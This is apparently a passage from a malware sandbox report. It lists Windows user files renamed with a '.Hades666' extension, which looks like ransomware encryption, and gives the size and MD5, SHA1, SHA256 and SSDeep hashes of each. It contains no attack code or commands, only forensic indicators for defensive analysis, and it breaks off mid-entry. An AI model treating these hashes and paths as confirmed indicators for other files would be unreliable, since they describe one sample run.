C:\Documents and Settings\FD1HVy\Pictures\QrmX5zar4TeL3G.png.Hades666 33.84 KB MD5: efa679c55f534cff84387c8d764bbd57
SHA1: 1206e6cbd61dcdaae3a261f65370cbae3c5871d2
SHA256: 5c911045fef816c9223cca024ee11c3f905d7288a89651f3ad27a6a0c3f2cd6e
SSDeep: 768:hcddgDMwlJkzy9X3oGNd+9XwaLPGjQS3Ib89oYlElA7JxZuNrBsj:addkXEzcIWs9gcz89rCsJylsj
False
C:\Documents and Settings\FD1HVy\Pictures\T4b_BS -CrryhZvHxt.bmp.Hades666 21.83 KB MD5: 5dff127a8cbaa3d61cfc30228dbcc74c
SHA1: 5f54de94fc8d11e3ba650971675f34f59ec67029
SHA256: 487e8cc734210c7859cad0753f0d206dcfcf82045f6405ad331d13bb0007dbd9
SSDeep: 384:HNYi/HshoHaQD/5vBKohn2I75D0WAc9QYfNbLmrVHVYfAPl31ORhb:H5Hsq6e6ohn2IND0KUJHVY4PpsRd
False
C:\Documents and Settings\FD1HVy\Pictures\v4ZDHE a-uoAR3Cw_zY0.jpg.Hades666 94.27 KB MD5: 8173df6bce444a9275b31050adb083da
SHA1: 118bb439bae6ff7ef76eb9de93816241359c2d26
SHA256: b2343318a4498ed8edb539b755c0f264cfa04cd7b7dcd2c85e086f28abc65e98
SSDeep: 1536:fiFaW2kvbfrNjR12CqrGTR34WmnJtzbKRJGwv2BLZFF50nC0ZIjfyRpjz6LhW/:aFR2kvbfrjARWZMFb0J9OlZFFICmIrK/
False
C:\Documents and Settings\FD1HVy\Pictures\Zo_fD_dUydT2ng.gif.Hades666 75.23 KB MD5: 8ee50c119ac54fe6f688ab7036a09706
SHA1: 85fc4d9b42a94fdfb4c3e84baff38f4eb39b3de8
SHA256: 163fb40a0f226a16c5814e05faf1e8ce3496e4e0844242fe48fb8b3d0fbd549f
SSDeep: 1536:v7ieV5v9AZGxETgnUX8ey0pfJ3q7XzzXsEuVmbwZaEPW+HlYGi1Fc:v7iLZFTaebhUvbO19O1Fc
False
C:\Documents and Settings\FD1HVy\Pictures\_tGw8TZHXe.jpg.Hades666 74.44 KB MD5: cb2a1dd7fe67df6d1b04dc2b2568fe67
SHA1: a797df764865743b6e9319e01b177fdf1728ecc6
SHA256: 31afadbab71b382b8bcce67e1a63730de1b3ca4c310a2e9dac3d99827d073aff
SSDeep: 1536:JTuppCHCuP2KH5r1HEhSWEJ+FgJuYmVfqjW:JTupYeMZEhQRDa
False
C:\Documents and Settings\FD1HVy\My Documents\-HEK-DXQ3wmbagAJfJY.pptx.Hades666 48.77 KB MD5: 519b435a0b4627f959226867097ec92a
SHA1: 0125e9ee0765cea22dba1b98d86bdc05f9ab887c
SHA256: 2b269aa8e3577111cf9849b8301e500df4d0b9bde60af47c137f8fb1c45cffcb
SSDeep: 1536:24iux4AyDSe343LPBSK1aHDLVod+JGte+FK:24iYxKV+SauSzte+s
False
C:\Documents and Settings\FD1HVy\My Documents\BZ4TrAu8yl96JSfZ.pptx.Hades666 12.48 KB MD5: f829f86bcc7e9993c2df2a017f0b7c07
SHA1: 4e7df3a20fb6a6d3ac5740a1ba880ce3aa597e96
SHA256: a416dde7754df63b76165c46779332b7d8a8c7fcf0696d5ee169e1a5f0318498
SSDeep: 384:L+VL2SBovuqGyrz7mkfOHvDx8yS6Rb/pTTm6V4xD:Li2SBMXfDWLxnAFxD
False
C:\Documents and Settings\FD1HVy\My Documents\cHQW.ods.Hades666 22.03 KB MD5: 261b6c0db3f83f80cbc19e9c50618a59
SHA1: 327131ddaa9290d2025b37bc5862c9adeaab1227
SHA256: e6bcf183b3bdd1581e2dfa67709fc69bb4480035b17a076681e3d28bd45dd174
SSDeep: 384:3KaPgvV4S+FZh9v2NMDtYZ/WaW8KOSHO8WzIJP6Oxzddav4N6JDiPauFz59x2tF+:3KaPyiIMpq+aWVOSHtWcF6izd0kX9x2O
False
C:\Documents and Settings\FD1HVy\My Documents\cxezl6TYX11ixWRNjCV.docx.Hades666 48.34 KB MD5: 4fdbd04cb180461c6b97a8ba48069eb3
SHA1: f4610d646a6e7fbc642f3145f43ea4fe09556133
SHA256: 78a22524f71923e0fde520b8602672d64ec4214d971d2dcd886812a62c219f0f
SSDeep: 768:+4ovOhriAAxD+JU00vLFksDWzmgg/HAJdMin24qrXsK9znSj47xHn7w+F:+xvuiAAIVCFq/CgbXG595pn7w+F
False
C:\Documents and Settings\FD1HVy\My Documents\Database1.accdb.Hades666 340.75 KB MD5: cfb0eac3846aa89ec068d60321b2cbc9
SHA1: eb165d0c185a9623afa5a494ebb43e4a73616919
SHA256: 251f75926c0640990a06e3deeb374ae0437f264d374922af15a1c507367dcd99
SSDeep: 6144:vdVZsrSVfOS79Lc3D1FxvqdfieoLt9Cg9SjiOwCUjLLh2DnFbkUgWaNDZF2RyJ7J:vdVGrSVfGT1FxUqeop9L23ULUDFbwpDJ
False
C:\Documents and Settings\FD1HVy\My Documents\dj05M a9Ph9ACFyExLrh.docx.Hades666 64.69 KB MD5: fac3415860f3c0a831f2d9c1bc899779
SHA1: d5e44ea04cd28d383765c7f3e39b3328d3df6fe8
SHA256: e839b750ed5afc0fe75d07311fb60fc226048bb551940b335527af49fd22f250
SSDeep: 1536:2vcP9xaTfPvQrU1K2Equ9ZeLAsVY6TBy/nIC1V3pssw:4cP9WYrU1KjqFLpVNy/nICLmd
False
C:\Documents and Settings\FD1HVy\My Documents\F4NHuiDmUc26bw37Go.xlsx.Hades666 75.72 KB MD5: 467e268bf0f0cfa09d7a6c9f01a15929
SHA1: a2326ba0bbffdd27f92c962f8a4accf55c87ff16
SHA256: e73b9264a232273d6bfb6315a5115cf3b90f0f01dac219f0e4289a80c403fd6c
SSDeep: 1536:EpWv+r4rjNZCM66f0+qb5Scw2PqdGburCbCUWZoA991o3G9QoHkl646V:l1rr2Iqscw2idFrCbC3oC91o3G9ri64g
False
C:\Documents and Settings\FD1HVy\My Documents\FhduDA Hp_S.pptx.Hades666 68.48 KB MD5: ac058faa41ab1f9608fe401881a6fe1b
SHA1: 8251c7757893935f1193e57aba1c4d013b2e0d8d
SHA256: e9bea61865bfd827e7efb9a17747985ec1f33e7b6de92b7f7bf1d7807b893dbb
SSDeep: 1536:Ht5yH0z5EQkxHEj6+7hNhZ155ivUXJXzD02TM9AH:N5BzPktoNhV15AvA502TZ
False
C:\Documents and Settings\FD1HVy\My Documents\FMoEmzd4.docx.Hades666 93.23 KB MD5: 9976dad4ddae44da528c79e4efbfacb1
SHA1: dc86f09087e5426f4c49578e4ef84f029b0c755c
SHA256: f2c736b0d76d9e9a20c48f60c9ebc7c64516b42cc056780283f4bb0190b7a576
SSDeep: 1536:cIJKKqJBsDqbDznuRg5La5lmwTSR6qVI196QCIYlEQeYDhofdpxf7y+obYnZl8QB:cIeYYDzuRmglhOxVK6eY2V0hofdTy+Zn
False
C:\Documents and Settings\FD1HVy\My Documents\hGEAu7lMb4Z5lAjdw.pptx.Hades666 20.72 KB MD5: 584708a84ed1636b5efd691ba38cea09
SHA1: 261314c15c35bbc43a79efff37f75c63d7a3ac84
SHA256: 69721cf48d73c3ad4eb8222ff70d3a49ecbbcf31f10195bddddd49935b4b6651
SSDeep: 384:EJUGGEHK2gwfSgWwpMSYXAsxuNrvF36S7siPcsL8zbcWTsRFsLMCirSno:EJUGLq2gw3OAsAxdJFozAWT0p
False
C:\Documents and Settings\FD1HVy\My Documents\Hy99X-RH7W-oRpNxJm.pptx.Hades666 28.47 KB MD5: 18ae349f2191a692039971553aa37b3f
SHA1: 6de170cb0301ae1fe7887553d1a8a455ff797a16
SHA256: 874cb4625b6db275b5b78932f47c0a9eec0cbf90798162bc78d9e7f6474524ef
SSDeep: 768:h7sTrDqfL38zQQ+KOSFTiaQKv5dONKlUx735CzJTeBQxxsX7jt:VsTrDK/TKOSFTtLkNK6aLxxg9
False
C:\Documents and Settings\FD1HVy\My Documents\mYd7cywDST.docx.Hades666 57.58 KB MD5: 1fecc9c11a7c78c593157f1967ff4cb4
SHA1: 2db44ea8c2c7f48d0167f48f8e426e568d68f047
SHA256: 1ffdb9f8a083c1fba8ed589acbaeec49cd6c2c1ae7ce7a36d93c98ec21f11696
SSDeep: 1536:JDcu23i8cZKsNFT7NcTKPQYkAaZHzycn9Yp+O3nIbUElqO9XCCZ:JDN23iBZKsPT7NJP3XaRyc47Ibm+SCZ
False
C:\Documents and Settings\FD1HVy\My Documents\o30CQCuB8bdhHb.ots.Hades666 50.50 KB MD5: 82b31444f967eb97c366bcaebc17a293
SHA1: 1f156201457a746fb576be8f25aa686e7cf5ccdc
SHA256: 38f2743ee3f9b464a114cbef78c22845c5490735157f62a935389d704ab43065
SSDeep: 1536:DHtFHYPQk7AFE/Io3E1lFt96P0+S7tFtf:PkQkkC/gGPkjtf
False
C:\Documents and Settings\FD1HVy\My Documents\oyjGs-vsR B9HxSBTe.xlsx.Hades666 58.52 KB MD5: 200f7afe44d461fe5fd04304f206ffce
SHA1: 0a138550e05f4d7d342b1d04d193be0e024fa7d9
SHA256: ab5f3885fddaf364c97312b95cbb81c68aeb122ee2018c2337c1232b68825061
SSDeep: 768:Toe2X48z4XWvJCEBrtaoC03ZJGrQNb9KzafBhaHBTs+2SlOhBesJ9dsZVQAWIiAL:ToeozTCErx3Z4k9YG9SK3iZoIiF7V0
False
C:\Documents and Settings\FD1HVy\My Documents\vJlQBx.xls.Hades666 47.59 KB MD5: a98e43f6c607458c42cbeae8f92f0614
SHA1: 86df3f7c5c9c962545a48eab7c5349d48312767d
SHA256: 9690fd59c0fea91321697f1c2361c383ba99fbf1ded03a13d245aa1b0d1b2cf4
SSDeep: 768:8ngv9f6FaHikmprN04OSSBE/cvMhU7m+iBEvEf+cM2M4Lbo9f+LtVsVO96L55cXS:8nCVmprN0cSBE/AgU3yE8f+ln4LcBo7Y
False
C:\Documents and Settings\FD1HVy\My Documents\vMA Qdvy.xlsx.Hades666 91.59 KB MD5: b0deb9d9ef64fefd62e92f5132519391
SHA1: cc32cd07c4e85e02d3803476e318e8e2e04c8e63
SHA256: dcd05a51ad5edd42b32b3ab9322e52ba52cd7c055b9516351be4015c98ab265a
SSDeep: 1536:KfLnoiknqnXTQYByaygCOnbcHOK4TqSvfjlNDWKuG7E1wsxJglSmfI1r31BEgB:TqnD1DoETqg7lNDpI1N8nYLn
False
C:\Documents and Settings\FD1HVy\My Documents\YCOQqj5kQ9XpLXm.xlsx.Hades666 33.17 KB MD5: bf80e740bcf8bd3542f1631626581afa
SHA1: 76e2302b4869b082891b144e71c91711ff0309d5
SHA256: 58d3309cc3a5b07f42b087f9660e68ca8965715fcca72b9d5d8537379e78ae1a
SSDeep: 768:OrwhwONHD9i007p53yr+hRyli+MRRZGpdn1b9pcSR:O0hbDQnn3y+h6VMalHLR
False
C:\Documents and Settings\FD1HVy\My Documents\Outlook Files\kkcie@kdj.kd.pst.Hades666 265.75 KB MD5: 2243850ff815e7bd44b1976a71927464
SHA1: 15353ad0dee4c4af1db5b8fc6399641ab2e373c9
SHA256: edff8fcc0f47f58396a7e4d01c74f6d567fe88ce7a7d6e22dbd0e93d375118d1
SSDeep: 6144:+LrNdIS2FC1rY5boJSe4f9U++jc712POuC9bG77VDEivbtu2W:soS2SbJ69j1cOp9bG7eYB8
False
C:\Documents and Settings\FD1HVy\My Documents\My Shapes\_private\folder.ico.Hades666 29.98 KB MD5: fdd1504a8709506d2cbb5899a38baa8e
SHA1: 75ecd76ca75e632f94cc09b8c7e8757c83172cb3
SHA256: c5377e007988abc8bd2ec2b0cc46ad3343eddfbbf46a0c74b8adba6763b0b691
SSDeep: 384:go1R2Kb1UKQId30JggiUFrleH47eyPReRAbPPY4x1xXJUN2A6f/CwBjnAx0KBEMX:R1R2Kb1z3MLmceysqbHY4jAkB8E1+T
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\xIKve1epy5TaSZNBJO.m4a.Hades666 48.83 KB MD5: df9695439e6592ab486e9f4952ebdf0d
SHA1: 47930804c3673f4f8a6d5f19eb874886d4add393
SHA256: d39bb1cdb7bb30e9e05988f599fc86ad1997e8d46940fc626db2d287e33a358e
SSDeep: 1536:czXKuzvfLB1jye5J6kgn67NnBS6dBQLs5jlSm05w:q6uzvDBN/vgn6xnBSpc3
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\BAaa3e1h2lTJYNIOURr.wav.Hades666 50.83 KB MD5: 1bcefa8295c03bfd19fc2105d8390a5d
SHA1: 8ef22d6e81d3e63383e636d3351b77296c16d6b8
SHA256: c6be156f648053d272a2a8d04389758140eb4e8f64c1f07540c6377e6f8bed73
SSDeep: 768:3iN1VEnqi+hmH/UiKVWyLvCi1k7iN17ZgwUisGJ94516+S13ck4h8ElYG:3ivmnqBhmH/ZKIA3iONg8LJi51Oy80
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\m3q-E9nfMbEgYl1Pe.m4a.Hades666 63.23 KB MD5: 8c7d8c429b47f010c7aedf6f67a66e00
SHA1: d2cb3269ba24db5671cbed90c0a2452d232fdca2
SHA256: e7c8e69fa2329832dbc78d5740d15651248e917047407d28cf6671c77c46c46e
SSDeep: 1536:+dL608RzUCb2JEZgF3XkcgHMM7Q9KynMVQIgm8+Ta45qkOruLkBuCDS8j1Bg:+xp8RV2xF5gHMiQmVimS41OrPxFj1S
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Te_ga.wav.Hades666 88.20 KB MD5: b59ccf461b1050091c888708b5f0464e
SHA1: 3d25199aa7644aaf43585ba5b378b113ca871528
SHA256: 34a4ceedf9411d7c2c2fed22b2c44bd90ae049cfa2525c7e93d5180ce1870fa5
SSDeep: 1536:5avx7JFoWLHXba6GtrEt7adDTdoooDAf6LQbtAUCD/q/LLQVcQsoXGyKlwM:MJFbTra6hdadDJ8Aycx0mPYcQhQz
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\_zhgc_Z.wav.Hades666 4.16 KB MD5: b157ed600efae573b1388318823e25fe
SHA1: 698ad39ceb3043457d9f3af53af4f9bdd4d748b4
SHA256: 3ee7c2f4940acfd5bd52480ff45b445ecbdd9f112037dcb405a4e0c31354a975
SSDeep: 96:eUXpr5W6Dgbvph6EzlZCK1T5sLD/YFYjSAGpIVTCAHyUNPOZ6Y:nFfULLHhTI08Ii5HYt
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\DxCsbzDxs.mp3.Hades666 39.58 KB MD5: b08103dd5b477b12353f40e707c3db2b
SHA1: 43c367a62f5b133e9cb04d7abe420a8f75314af2
SHA256: 79f4e56babe67bdd0533b1e2eb0ad28fcc4ff64e7fee8268b585e38ac86a7879
SSDeep: 768:ZdGdodnRqlBM1sQc2lxT95Fo/sbQy7kAsBd7H1w9uzO816R5QY60M+H57cY4t5g+:ZMGRYWsdmDfbQGsBd7Hal/3b4t5H
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pz05d0eMPE9uLbau\y-gmiZ3EVZAMHBqa.m4a.Hades666 16.64 KB MD5: 39020a2b106b8b336341228ac4adcf31
SHA1: 8348464ac0962235b62f6eb36358434a2518c011
SHA256: 5a930a7ce89a328ea52e53b735254e0bee3eb34156711635f91d9699957c6725
SSDeep: 384:Rcn3pKus8S2SUrQLIzJW4FVrxgU8zr4SqPWcWfA:Rc5c8Jz2U84SqsA
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\8a15c9EmXZUQkn3yZLSu.mp3.Hades666 52.02 KB MD5: 49ee665afd6e9cf386559d4dafa27980
SHA1: c08579de8a9d8bc90d3db4bf9a0b6cba11819262
SHA256: 761ee759e66a44c461421110505d1f6c9fcbb2ac569d2a60f5c7089fb6236c09
SSDeep: 1536:MznH+MWFOkBWUfgOpQEYZTBg86u6+1HRg:M7R30WudpQEYZTBg86x8C
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\jIzljgerjD3abNZk.m4a.Hades666 3.62 KB MD5: bef6dfc79a002b28a396325e8cfd0d09
SHA1: 85b06d16580e36fbdf7d593f395b704d4c601e29
SHA256: 9271d8911857d02693bf575335f38fa08bd60cc9b09d3085b6ce57c80a27d793
SSDeep: 48:FPOlhv30ekBFhW5t/UIh541AOl3A3yCyjLeX7PGvaoudvLzKfLJXLY3aFZmWayOT:qhP4B38R90iO/FjC6YzKNXLs8ZuyOZ6Y
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\rHULW.wav.Hades666 97.08 KB MD5: dd45241b4cb01182ecfd436b59195721
SHA1: 6e1bae250b43836c3a1a7c1145eec1b3d26d83d1
SHA256: b0f770edf0f31936b666096ec15f52c3625f6421c1909fb5387ea1618f7fe8e5
SSDeep: 3072:LEj5nDuJHr+JbhNG/S1hCzYq1c4gWJMxSygK:0uJHaTE/S1hNqOH
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\9iPxYg1O.mp3.Hades666 17.22 KB MD5: 2698e38aa19a007e33f44365b898df67
SHA1: f04ee22a87c23ee80e52a8aaa0af06f1c286347c
SHA256: 932e1d66ef605e836a82cfc9d6ff892f5b0657c05087de259cde030a38cc6918
SSDeep: 384:Of2qIZP6Q7sjY/75mfIuafULR0p0TsyhAyHIaIEtr5:OfXIxlFmoAR0p0TsdfaIs
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\PKipV99o wn\zin-T7pL1d07aj.m4a.Hades666 48.55 KB MD5: f1fd6242028ea7593c63c8c5b6bb4167
SHA1: 6844c0d4a5a2346fbd158f00abec72e25a57620b
SHA256: 094d6f0d1866e89860ee9bc329990897edff2377bbb351a2404c790e8c452f66
SSDeep: 1536:Nc8KKGMmHlq+ID2FEWXnz1gnwcNxdhSw4:NcRKGHqDD22CIw6xDSw4
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\XBdTL-CUh-k.wav.Hades666 76.56 KB MD5: d440c1ca235e48000bb7e2b2f0641adb
SHA1: c4890e1e0e0ea34184f094e3adb39145748b349e
SHA256: 385e834f8523bd4ee57235d9dc8bb47edb7ac234c60b0b07e459382cd315721e
SSDeep: 1536:6rYLjYJPfjUMIP/6K2YTE8fgpYmxcezphl/kcjf6GEvWXng7+L1Kb7DX6q3Gm:68Lj+3QMIPSK2Yw80weJ56n6ZxKb7DXh
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\QNvdrxGyuyXkTr.m4a.Hades666 84.38 KB MD5: e3a100c4e00c503c23ae895d21199cc7
SHA1: 39c767f382ddd73a0da8d56d76b47227c5a24825
SHA256: 6d782b3f64ce51a952e6d861d2de00f0cfa981f2a0ed41418bcf034cc36eabac
SSDeep: 1536:ccjBXP58xnopwzJ4HYBU5CV6tvsHq30JuagOUJcQxAxbOfQn5uOa03M/Ttc1MP:FP5Ono6yHMU5j0KEuDJcQixb425uZFBd
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\r3evlg.mp3.Hades666 54.14 KB MD5: 454d29bb3989d71ea88594d41deddc3a
SHA1: a746dabf148b3b3042d2f2107f914e2943658451
SHA256: 2e6d22a180d38249e5448f9b0f650691ada58e8c3abab33a8f66a678bb80cefe
SSDeep: 1536:bWDcGnGVFdfttO82LFTkuW8QbyykGedM94/:6D9GHdfHORhTibyZX64/
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\uTrfomCxIjimUGwk.wav.Hades666 54.92 KB MD5: 5ebe28546c46dfa692ae21913744a19e
SHA1: 2f142608ad24a60c1b1518835b13dbd28b08fef7
SHA256: f208a462998a1b7ca280d9056ccdb6f616cfd0ed3af814d88da29641f3d810c9
SSDeep: 1536:fkb1Dpr3Hk7JqxrwN+Ha+vlJ4Y4RC6iXH9u36w9HnIm99d:CrTk7JEwNl+LR4I6iXH9u6w9V99d
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\YUIsYjlW9J5Ehao1EkEz.mp3.Hades666 3.91 KB MD5: af867acdbfb666bed8f318215ced2def
SHA1: 2a2032709478884980fad17410463a3595c0fe71
SHA256: 8079981b0e9aa465104f4b599295f999b69cbcdf298a48661ff541fa01b52fd2
SSDeep: 96:gDQsjXKKeiORPgBbHPN1WtOmM9GcQB1WkfZOZ6Y:gVXKfiOsbvNcm9GTQkfit
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\5FKUdmKmT3tyICvOkik4.wav.Hades666 76.22 KB MD5: 7edca506a3f4e02713e3907c6858da3f
SHA1: 072136376c38ab80eafef50b718b3a8ea78386cc
SHA256: a21381104c23f7c365992fd3b1c0c0379ce7f8e154cd2dbdac3853799a5085e3
SSDeep: 1536:Of6MDd4W7NTf/OmMWEAYOTd3b0ZWUMB7B:Of6AdD7pmmMWvYSQZW77B
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\vK1-.wav.Hades666 18.62 KB MD5: 39009c9c1ba7c76d42782bb8b7983473
SHA1: e6e3a8a09af639be23d16a400eed6e79116be419
SHA256: feded74f185cf9b407c01d59ee55575b8eab404934a1494db0d687cef7b2edd0
SSDeep: 384:nmK+FdRq4B16Po7Fl5329ON3wl7so4G5v142M8DNlJPO9O8ci8:mdFdRqa160NDwlj5v1tlJPsOh1
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\1uqkkl.m4a.Hades666 11.94 KB MD5: d1bfc41104241e1406b63fa2bfe051d1
SHA1: 9f68e246a4d7e7a1af47022b6d43ccebe240ab37
SHA256: 8c23b3d148046a5dfc9ac2bdda264718edec9e813ad587530a477e86dd1c57a1
SSDeep: 192:P4ICH2YhhMLC/H8idOhKPTekqfmUu+shO8wSmELlLEbLgtwd9ysSenm4sRw7Siu9:xCWYh/cyKdNv0nsEB44twd9fFnmfw7k9
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\eevQcTFNQMa.m4a.Hades666 39.89 KB MD5: d210e02c1ee97975b3624144598e2ec6
SHA1: 1593a170496d5bf784a25b7c67c3c88e04d51310
SHA256: 9ef863ec91298fa109ae477b59b63c3940b14ef9531be0bfc92ac35aa5b020ea
SSDeep: 768:QEHqiPquesudAm/Hq8xpb+H2j49VxvDUaZyN22bQzqmhF7BFsXSGltT:BquesudAcxpSW89DLfo220FVFsjltT
False
C:\Windows10Upgrade\upgrader_default.log 245.08 KB MD5: f8112b6d8be1dbc3134d1181210dcba0
SHA1: a6bb3eb013e2c409df516bc58121509750be6e5c
SHA256: a03748a42082051b2b0adfcda1a2c738bf389be50c9d2b836da626b9ae0d1ddf
SSDeep: 6144:wmPPw+3KN+46ThpRNGjAsWwcToFDn38UkMIWuq8udykOcTeLXN3Xi:wm1d4SYjrAToFL8U5IWZby1cTeLXNC
False
C:\Windows10Upgrade\upgrader_win10.log 20.83 KB MD5: 01d58b7b8403961d018850a6192f1b2d
SHA1: 444c0c29d5ec0073800b19f13b1e7595242cb4a3
SHA256: 447a4ca23bd823335de5719666b2c5153c38bfb91f4d5681724c811ae71794ed
SSDeep: 384:NAdLuFXvdPs/yJo7dr8iTDKI0kYzFErrhHQvNy6S0Ner8YOQnmHfvCE5AClFRFDV:0svBQrXGrbxq+vqr7K/vCEljFi4
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 1cd353bd97a5588e0538494e81311634
SHA1: 2551e99b9d2277e1d337034d16129b19a046fddb
SHA256: 2aeab29e353e2a2836a76722bd405f688d4440b97f05e90da4e69f09eacbf57e
SSDeep: 24:qT0kgTMN9ELjajpZO+Xnv0ZVuqIGh0za2HZJu:dkgTiSLiOgcZVuqIT97u
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: bbdc1e03e0b6dc99edb62219c4e37884
SHA1: eab022598d42a620123b0014e783c4986e9ab391
SHA256: c5b20d51b96a4beed9575e63836748cbe0a22b6eca4d1963c701fcc8562ddc7c
SSDeep: 96:nyjUuT1NNbDN8zzZ76EDxY2DWcrb2OzmH2ZTnOZ6Y:Py/NizZ7bDxpTriOw2Zkt
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: 55c31491d56456b11132acc2cc9350fc
SHA1: 8e75e84095c4a0510521cf41467e2a0a0ae6bffb
SHA256: 7226d2c6985bf1a6bb2ba09bd50cb15a8ef70b95e2ecd12738b34dba24854863
SSDeep: 96:KjtmdDVnvafyIXt9bS1iHSEqZyN5NW68MIPmKOOZ6Y:KMRO19lQ+S/Zkvk9mK5t
False
C:\Documents and Settings\Public\Libraries\RecordedTV.library-ms.Hades666 1.69 KB MD5: bc04a6ef9004f801b73e7db01c1eedad
SHA1: 3bc04cc8274adb3ec4d41aa50b2d4d74e3b70b7e
SHA256: e0f374e553068893366fc853e8e765cc504aa67af3bb9cd56151fbcd5cd65bcf
SSDeep: 48:/lx8OiRYI9/Zvhjfh9dcFpXhx76aOgcZVuqIT97u:9ijVZvbLcPxh6aOZ6Y
False
C:\Documents and Settings\FD1HVy\Videos\9ons\Jua Yx5oT-TmG.flv.Hades666 38.83 KB MD5: 753fa8db25f275f4afdaba31908137d8
SHA1: 07285291c3c7db9f55389a82436ef67fc9c754ee
SHA256: c5d6b682f38f9d0977e1aef1a2bbd9f783d76203c0ab8889faa9129a78047811
SSDeep: 768:caEZCQiFOdxvY5/WJgdu3/FVOvtAIcIg86dK4UzY05x1UM/GB:/EiFO3vYRWl3/FbIfG705xeDB
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\6hXid1btCJcj.mp4.Hades666 45.28 KB MD5: 971adabc425f894002ca84827f1c4908
SHA1: e56a9583d8670ae57b9900f8334c023808391e0a
SHA256: ea5ec8b3abd67462783178188b73d98dc6c210f20209cc6996cbe6f59ed17106
SSDeep: 768:7HFRlnS1D42UGvkzB3rMaSbuHios33M2omYR+KB4T9weBQiF/VxUp6H1JJ05:1S1ieiBbMaSbtP3M2or+KyZ1BQOPx1Ji
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\waEwyjT9rU.avi.Hades666 82.22 KB MD5: db1a080086d909fa7e7d9691998ef3b4
SHA1: 0b8089a9dd038b9fa2846a8c859a03213fc2f5a2
SHA256: c80b42ea66cc61ea33a49b52723565ff8d64429e58644eff52206ac8f2de1f6b
SSDeep: 1536:boo92ZoYN8nca1Of6WNsPRUW4PrKs6aXyAnGrrETC8ykXqLYyW13vJe9BI:kiQ8nB1eNsWW4PrKBaCVrAmpkRxfJefI
False
C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\af8fPy-wZz\8e2on\ITXjK9.swf.Hades666 77.00 KB MD5: b7932d7709f83a01bf9cb568191c4c0d
SHA1: 55cd344934a1892ed75ad47bcb11cbab08f3e64a
SHA256: 62864654471a4f6ca1b927f955585f315913a19569efde53d105d0caeef2d042
SSDeep: 1536:miVC6mDm0AWTYgALK8bwUO1zKv5lvO9op6PtFEN14VGd0xi6a5vsOafd4F387:6PgWhmK8bwZ1zKv5lvPpZNmGd0862Rfk
False
C:\Documents and Settings\FD1HVy\Videos\9ons\2eLTi4fiQ5NoAFf\6 iJ LK5SpJWis.mkv.Hades666 71.59 KB MD5: bfdd31b1e7cb688ec9b455a3b200235d
SHA1: 49902fb55f7d700de95b7fbda698b0346d14ce73
SHA256: 0e833e7c47f3682e07623622548e241ee7fc9a0f7c6242fdc8ef9cc993d69d86
SSDeep: 1536:pOcqErU/ihErYCNWv4yJFfT258LqDXT8yrMJ5qnYSFDYDb4n:FPEiKMJN8MqjT8J5qbKEn
False
C:\Documents and Settings\FD1HVy\SendTo\Mail Recipient.MAPIMail.Hades666 784 bytes MD5: c5aa1a9f6c56e8e512a79a4a01bc459e
SHA1: 220680c8d11c25f63212743dee85844a65c2a922
SHA256: 33249de0e230158907330335f78b9d441cddfd1a0d21048b8d3e486f17b812e2
SSDeep: 24:3LRsHMGF6IEl877O+Xnv0ZVuqIGh0za2HZJu:7aMs7E+7OgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1044f75bed7c89a3.automaticDestinations-ms.Hades666 2.25 KB MD5: 6a921e4c86f1a5417252eb3b60fe175b
SHA1: ab51e3ba66113e0b56ad23e008b000809c164db3
SHA256: 241366bc014ce0ff1b752eab708cf9e7fea7b6d7cd6808df88fb23ed730f28e9
SSDeep: 48:2E782C1NRZwA+lSXClVIbV6sKpMoPRkOgcZVuqIT97u:2c820N0JSdbV6sKOoPRkOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms.Hades666 3.75 KB MD5: 3bb6834a07cfaf0e4ec759c255077dc7
SHA1: cc4d5ceaedceed4c28b6a288da54b04a3a9ff65c
SHA256: 5e0fd8313a958fd3b38cfe246cbebad591252d454072d7be6e89474fe7705f79
SSDeep: 96:7u+bzky46f9d57+sFgFPTZmnykD+B4YJ6WloJpo8b1OZ6Y:7ZbFZf/5ZiZmnFayYJDE8t
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1bc9bbbe61f14501.automaticDestinations-ms.Hades666 3.25 KB MD5: fac829036b22f966e5c0e4e8206897c4
